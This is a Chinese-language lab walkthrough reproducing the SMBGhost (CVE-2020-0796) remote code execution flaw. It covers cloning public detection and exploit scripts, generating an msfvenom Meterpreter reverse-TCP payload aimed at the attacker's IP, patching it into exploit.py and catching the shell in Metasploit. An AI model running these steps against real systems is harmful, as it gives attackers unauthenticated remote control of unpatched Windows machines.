1. 程式人生 > 實用技巧 >CVE-2020-0796“永恆之黑”漏洞復現

CVE-2020-0796“永恆之黑”漏洞復現

0x00 漏洞概述

Microsoft Server Message Block 3.1.1(SMBv3)協議在處理某些請求的方式中存在程式碼執行漏洞。攻擊者可以精心構造資料包傳送到SMB伺服器,無需經過身份驗證,即可在目標伺服器上執行任意程式碼。攻擊者可通過部署一臺惡意SMB v3伺服器,並誘導使用者(客戶端)連線到該伺服器,一旦目標使用者連線,即可在計算機上執行攻擊者自定義的惡意程式碼。由於上述漏洞與WannaCry(2017年5月“永恆之藍”)漏洞較為相似,易被蠕蟲利用傳播惡意程式,可能會成為惡意軟體和攻擊者廣泛利用的漏洞

0x01 影響範圍

  • Windows 10 Version 1903 for 32-bit Systems

  • Windows 10 Version 1903 for ARM64-based Systems

  • Windows 10 Version 1903 for x64-based Systems

  • Windows 10 Version 1909 for 32-bit Systems

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows Server, version 1903 (Server Core installation)

  • Windows Server, version 1909 (Server Core installation)

0x02 測試環境

靶機:cn_windows_10_consumer_editions_version_1903_x64 (關閉防火牆)

攻擊機:kali 2020.1

(PS:如果步驟沒錯卻不能攻擊成功,可以重啟Win10再嘗試)

0x03 漏洞復現

3.1 漏洞檢測

通過git 命令下載檢測漏洞的python指令碼

1 git clone https://github.com/ollypwn/SMBGhost.git

利用指令碼測試目標主機是否脆弱

3.2 漏洞利用

下載漏洞攻擊的指令碼

1  git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

exploit.py原檔案不能直接用來攻擊,需要修改其中的USER_PAYLOAD部分

利用msfvenom生成payload

1 # lhost為kali的IP,lport為監聽埠
2 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.104 lport=4444 -b '\x00' -f python

為了防止操作失誤,將exploit.py原檔案檔案進行備份

用vim開啟exploit.py

將USER_PAYLOAD部分刪除,替換為我們之前用msfvenom生成的payload

替換之後,在最後追加一行 USER_PAYLOAD = buf ,儲存並退出

在另一個視窗開啟MSF開啟監聽

執行exploit.p指令碼對Win10進行攻擊

再返回檢視開啟了MSF的視窗,已經成功連線

在Win10上檢視埠,連線存在